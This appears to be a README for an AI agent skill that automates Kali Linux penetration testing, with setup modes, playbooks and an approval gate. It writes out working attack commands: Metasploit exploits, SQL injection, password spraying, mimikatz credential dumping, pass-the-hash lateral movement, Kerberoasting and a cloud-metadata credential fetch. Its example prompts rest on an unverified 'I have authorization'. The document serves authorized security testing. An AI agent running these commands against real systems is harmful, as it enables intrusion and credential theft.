kali-pentest-ai-agent
Skill by ara.so — Security Skills collection.
An AI agent skill for autonomous penetration testing using Kali Linux. Provides 269 CLI security tools across 14 categories, 15+ scenario playbooks, intelligent attack path planning, cross-phase result integration, and mandatory human approval for high-risk actions. Unlike traditional automated scanners, this skill enables AI agents to adaptively plan, execute, and iterate through penetration testing phases like a human security researcher.
What It Does
- Autonomous Attack Planning: AI agent analyzes targets and plans multi-phase attack paths
- Tool Selection & Execution: Intelligently selects from 269+ Kali tools based on context
- Cross-Phase Integration: Integrates findings across reconnaissance, scanning, exploitation, and post-exploitation
- Adaptive Strategy: Adjusts testing approach based on intermediate results
- Human Approval Gates: Requires explicit authorization before high-risk actions
- Depth Control: Supports Quick/Standard/Deep testing modes with coverage matrices
- Structured Reporting: Generates Markdown and HTML reports with evidence and remediation
Installation
1. Install the Skill
Copy the skill directory into your AI agent's skills folder:
# For Claude Code (personal)
cp -r kali-pentest ~/.claude/skills/
# For Claude Code (project-specific)
cp -r kali-pentest .claude/skills/
# For OpenClaw
cp -r kali-pentest ~/.openclaw/skills/
# For Hermes Agent
cp -r kali-pentest ~/.hermes/skills/
2. Set Up Kali Environment
Choose one of three modes:
Local Mode (agent runs directly on Kali):
# Ensure you're on Kali Linux
cat /etc/os-release | grep Kali
# Verify tool availability
which nmap msfconsole burpsuite
Server Mode (SSH to remote Kali):
# Generate SSH key if needed
ssh-keygen -t ed25519 -f ~/.ssh/kali_key
# Copy public key to Kali server
ssh-copy-id -i ~/.ssh/kali_key.pub root@kali-server-ip
# Test connection
ssh -i ~/.ssh/kali_key root@kali-server-ip "uname -a"
Docker Mode (containerized Kali):
# Pull Kali Docker image
docker pull kalilinux/kali-rolling
# Create persistent container
docker run -d --name kali-pentest \
  --network host \
  --cap-add=NET_ADMIN \
  --cap-add=NET_RAW \
  -v "$(pwd)/kali-pentest:/workspace" \
  kalilinux/kali-rolling tail -f /dev/null
# Install base tools
docker exec kali-pentest bash -c "apt update && apt install -y kali-linux-default"
3. Configure Environment Variables
# Set Kali connection mode
export KALI_MODE="local" # or "server" or "docker"
# For server mode
export KALI_SSH_KEY="$HOME/.ssh/kali_key"
export KALI_HOST="root@192.168.1.100"
# For docker mode
export KALI_CONTAINER="kali-pentest"
# Output directory for reports
export PENTEST_OUTPUT_DIR="$HOME/pentest-reports"
mkdir -p "$PENTEST_OUTPUT_DIR"
Key Commands & Usage
Invoke via Slash Command
# In Claude Code or compatible agent
/kali-pentest
Invoke via Natural Language
Quick Scan Example:
Kali tools are available locally (this machine is Kali).
Target: 10.0.0.0/24
Quickly scan the target network for open ports and services.
I have authorization.
Standard Assessment Example:
The persistent Docker container `kali-pentest` is initialized.
Use Docker mode to run a web application penetration test against http://192.168.1.50.
I have authorization.
Deep Assessment Example:
Kali server: ssh -i ~/.ssh/kali_key root@192.168.1.100
First run a full port scan against 192.168.1.50, then plan and execute
an in-depth penetration test — do not overlook any potential weakness.
I have authorization.
Core Workflow
The agent executes five steps:
Step 1: Environment Setup
# Agent verifies Kali access
ssh -i ~/.ssh/kali_key root@kali-host "which nmap msfconsole sqlmap"
# Or local mode
which nmap msfconsole sqlmap
# Or docker mode
docker exec kali-pentest which nmap msfconsole sqlmap
Step 2: Planning
# Agent confirms authorization and scope
# Selects appropriate playbook from decision tree:
# - external-network.md
# - internal-network.md
# - web-application.md
# - active-directory.md
# - api-security.md
# - cloud-native.md
# - mobile-application.md
# - wireless-network.md
# - password-audit.md
# - source-code-audit.md
# - social-engineering.md
# - physical-security.md
# - voip-ics.md
# - post-exploitation.md
# - reporting.md
Step 3: Execute Phases
Reconnaissance:
# Host discovery
nmap -sn 192.168.1.0/24 -oN hosts.txt
# DNS enumeration
dig @8.8.8.8 example.com ANY +noall +answer
dnsenum --enum example.com
# Subdomain discovery
subfinder -d example.com -o subdomains.txt
Port Scanning:
# Quick scan
nmap -T4 -F 192.168.1.50
# Full TCP scan with service detection
nmap -p- -sV -sC -O 192.168.1.50 -oA full-scan
# UDP scan for common services
nmap -sU --top-ports 100 192.168.1.50 -oN udp-scan.txt
Vulnerability Detection:
# Nmap vulnerability scripts
nmap --script vuln 192.168.1.50 -oN vuln-scan.txt
# Web vulnerability scanning
nikto -h http://192.168.1.50 -output nikto.txt
# SSL/TLS testing
sslscan --no-failed 192.168.1.50:443
Exploitation:
# Metasploit Framework
msfconsole -q -x "use exploit/multi/http/struts2_content_type_ognl; \
set RHOST 192.168.1.50; set LHOST 192.168.1.10; exploit"
# SQL injection
sqlmap -u "http://192.168.1.50/page?id=1" --dbs --batch
# Password spraying
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success
Post-Exploitation:
# Privilege escalation enumeration
linpeas.sh | tee linpeas-output.txt
# Credential dumping
mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
# Lateral movement
crackmapexec smb 192.168.1.0/24 -u admin -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
Step 4: Analyze & Iterate
Agent integrates results across phases:
# Example: Agent logic (pseudocode)
if redis_noauth_found:
    exploit_redis_for_shell()
if shell_obtained:
    run_privilege_escalation_enum()
if credentials_found:
    attempt_lateral_movement()
Step 5: Report Generation
# Generate Markdown report
cat > report.md <<EOF
# Penetration Test Report
## Executive Summary
- Target: 192.168.1.50
- Date: $(date)
- Severity: Critical findings detected
## Findings
### [CRITICAL] Unauthenticated Redis Access
**Evidence**: \`\`\`redis-cli -h 192.168.1.50 INFO\`\`\`
**Impact**: Remote code execution via Redis module injection
**Remediation**: Enable authentication with \`requirepass\` directive
## Attack Chain
Redis no-auth → SSH shell → SUID privesc → root access
EOF
# Convert to HTML (agent uses reporting tools)
markdown report.md > report.html
Common Patterns
Pattern 1: Network Penetration Test
# Phase 1: Discovery
nmap -sn $TARGET_NETWORK -oG - | grep "Up" | cut -d' ' -f2 > live-hosts.txt
# Phase 2: Port scanning
while read -r host; do
  nmap -p- -sV -sC "$host" -oN "scan-$host.txt"
done < live-hosts.txt
# Phase 3: Vulnerability assessment
while read -r host; do
  nmap --script vuln "$host" -oN "vuln-$host.txt"
done < live-hosts.txt
# Phase 4: Exploitation (with approval)
# Agent pauses here for human confirmation
msfconsole -r exploit-script.rc
Pattern 2: Web Application Test
# Passive reconnaissance
whatweb http://$TARGET
wafw00f http://$TARGET
# Active scanning
nikto -h http://$TARGET -output nikto.html -Format html
zap-cli quick-scan --self-contained http://$TARGET
# Targeted exploitation
sqlmap -u "http://$TARGET/page?id=1" --risk 3 --level 5 --batch
wpscan --url http://$TARGET --enumerate vp,vt,u
Pattern 3: Active Directory Assessment
# Initial enumeration
crackmapexec smb $DC_IP -u '' -p '' --shares
ldapsearch -x -H "ldap://$DC_IP" -b "DC=corp,DC=example,DC=com"
# Kerberoasting
impacket-GetUserSPNs corp.example.com/user:password -dc-ip $DC_IP -request
# Bloodhound collection
bloodhound-python -d corp.example.com -u user -p password -ns $DC_IP -c all
# Post-exploitation
impacket-secretsdump corp.example.com/admin@$DC_IP
Pattern 4: Cloud-Native Security
# Kubernetes enumeration
kubectl get pods --all-namespaces
kubectl get secrets --all-namespaces -o json | grep -i password
# Container escape detection
amicontained
# Cloud metadata access
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
Configuration
Depth Settings
Control testing thoroughness via natural language:
| Trigger Phrase | Depth | Coverage |
|---|---|---|
| "quick scan", "fast check" | Quick | Top 100 ports, common vulnerabilities |
| (default) | Standard | Full TCP, service fingerprinting, OWASP Top 10 |
| "comprehensive", "deep", "thorough" | Deep | All ports, exhaustive vulnerability checks, manual verification |
Approval Gates
High-risk actions require explicit human confirmation:
- Exploitation attempts (RCE, privilege escalation)
- Credential dumping
- Lateral movement
- Service disruption (DoS tests)
- Data exfiltration
Agent will pause and request approval:
🔴 HIGH-RISK ACTION REQUIRES APPROVAL:
Execute Metasploit exploit against 192.168.1.50 (RCE attempt)
Type 'APPROVE' to proceed or 'DENY' to skip:
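One way to enforce the approval gate together with the authorized scope before any command runs, as an added example that is not the skill's own code. The `gate` function, the tool-to-category mapping (built from tool names in this page's examples) and the fail-closed handling of commands without an IPv4 target are assumptions.

```python
import ipaddress
import re
import shlex

# Assumed mapping: tool names from this page's examples, grouped under its high-risk categories.
HIGH_RISK_TOOLS = {
    "msfconsole": "exploitation",
    "sqlmap": "exploitation",
    "mimikatz": "credential dumping",
    "impacket-secretsdump": "credential dumping",
    "crackmapexec": "lateral movement",
    "impacket-psexec": "lateral movement",
}
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}(?:/\d{1,2})?\b")


def extract_targets(command):
    """Return each IPv4 address or CIDR literal in the command as a network object."""
    return [ipaddress.ip_network(m, strict=False) for m in IPV4_RE.findall(command)]


def gate(command, scope, ask=input):
    """Return (decision, reason); decision is 'run', 'skip' or 'deny'. Fails closed."""
    allowed = [ipaddress.ip_network(s) for s in scope]
    try:
        targets = extract_targets(command)
        tool = shlex.split(command)[0].rsplit("/", 1)[-1]
    except (ValueError, IndexError):
        return "deny", "command or address could not be parsed"
    if not targets:
        return "deny", "no IPv4 target to check against scope"
    for target in targets:
        # Every address in the command must sit inside an authorized IPv4 network.
        if not any(net.version == 4 and target.subnet_of(net) for net in allowed):
            return "deny", f"{target} is outside the authorized scope"
    category = HIGH_RISK_TOOLS.get(tool)
    if category is None:
        return "run", "in scope, not high-risk"
    answer = ask(
        f"HIGH-RISK ACTION REQUIRES APPROVAL ({category}): {command}\n"
        "Type 'APPROVE' to proceed or 'DENY' to skip: "
    )
    if answer.strip() == "APPROVE":
        return "run", f"{category} approved by operator"
    return "skip", f"{category} not approved"
```

Scope is checked before the prompt is shown, so an out-of-scope command can never be approved by a tired operator; anything other than the exact string `APPROVE` skips the action.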
Troubleshooting
Connection Issues
# Test SSH connection
ssh -i $KALI_SSH_KEY -v $KALI_HOST "echo 'Connection OK'"
# Test Docker connection
docker exec $KALI_CONTAINER echo "Container OK"
# Check network connectivity from Kali
ssh -i $KALI_SSH_KEY $KALI_HOST "ping -c 3 $TARGET_IP"
Tool Not Found
# Install missing tool (server mode)
ssh -i $KALI_SSH_KEY $KALI_HOST "apt update && apt install -y <tool-name>"
# Install in Docker
docker exec $KALI_CONTAINER bash -c "apt update && apt install -y <tool-name>"
Permission Errors
# Grant NET_ADMIN capability (Docker)
docker run --cap-add=NET_ADMIN --cap-add=NET_RAW ...
# Run as root (server mode)
ssh -i $KALI_SSH_KEY root@$KALI_HOST
# Check sudo privileges
ssh -i $KALI_SSH_KEY $KALI_HOST "sudo -l"
Output Collection Failures
# Ensure output directory exists
mkdir -p $PENTEST_OUTPUT_DIR
# Check disk space
df -h $PENTEST_OUTPUT_DIR
# Verify write permissions
touch $PENTEST_OUTPUT_DIR/test && rm $PENTEST_OUTPUT_DIR/test
Agent Stops Early
If coverage is insufficient:
The current pentest results are not comprehensive enough.
Check the playbook's "Stop When" conditions and coverage matrix.
Have all required tool categories been utilized?
Real-World Examples
Example 1: External Network Pentest
# Reconnaissance
amass enum -d target.com -o subdomains.txt
nmap -iL subdomains.txt -p 80,443,8080,8443 -oA web-services
# Vulnerability scanning
nuclei -l web-services.txt -t cves/ -o nuclei-findings.txt
# Exploitation (approved)
msfconsole -x "use exploit/multi/http/apache_log4j_rce; set RHOST 10.0.0.50; exploit"
# Report
cat nuclei-findings.txt web-services.nmap > final-report.md
Example 2: Internal Network Compromise
# Initial foothold via phishing (simulated)
# Now on internal network: 172.16.0.0/16
# Host discovery
netdiscover -r 172.16.0.0/16 -P
# Lateral movement
crackmapexec smb 172.16.0.0/16 -u admin -H $NTLM_HASH --sam
# Domain enumeration
bloodhound-python -d corp.local -u admin -p $PASSWORD -c all -ns 172.16.0.10
# Domain admin compromise
impacket-psexec corp.local/dadmin@172.16.0.10 -hashes :$DA_HASH
Example 3: API Security Assessment
# Parse OpenAPI spec
cat openapi.yaml | grep -E "paths:|/api/"
# Automated fuzzing
ffuf -w /usr/share/wordlists/api-endpoints.txt \
-u https://api.target.com/FUZZ \
-H "Authorization: Bearer $API_TOKEN"
# Authentication bypass testing
sqlmap -u "https://api.target.com/user?id=1" \
-H "Authorization: Bearer $API_TOKEN" \
--batch --level 5
Documentation References
- Official Kali Docs: https://www.kali.org/docs/
- Playbooks: kali-pentest/references/playbooks/
- Tool Categories: kali-pentest/references/<category>/
- Environment Setup: kali-pentest/references/environment/
Tested Models
Optimized for:
- claude-opus-4.6
- claude-sonnet-4.6
- deepseek-v4-pro
- qwen3.6:27b (local, requires ≥128K context)
Legal & Ethical Use
⚠️ AUTHORIZATION REQUIRED: This skill is for authorized penetration testing only. Always obtain explicit written permission before testing any target. Unauthorized access to computer systems is illegal under CFAA (US), Computer Misuse Act (UK), and similar laws worldwide.

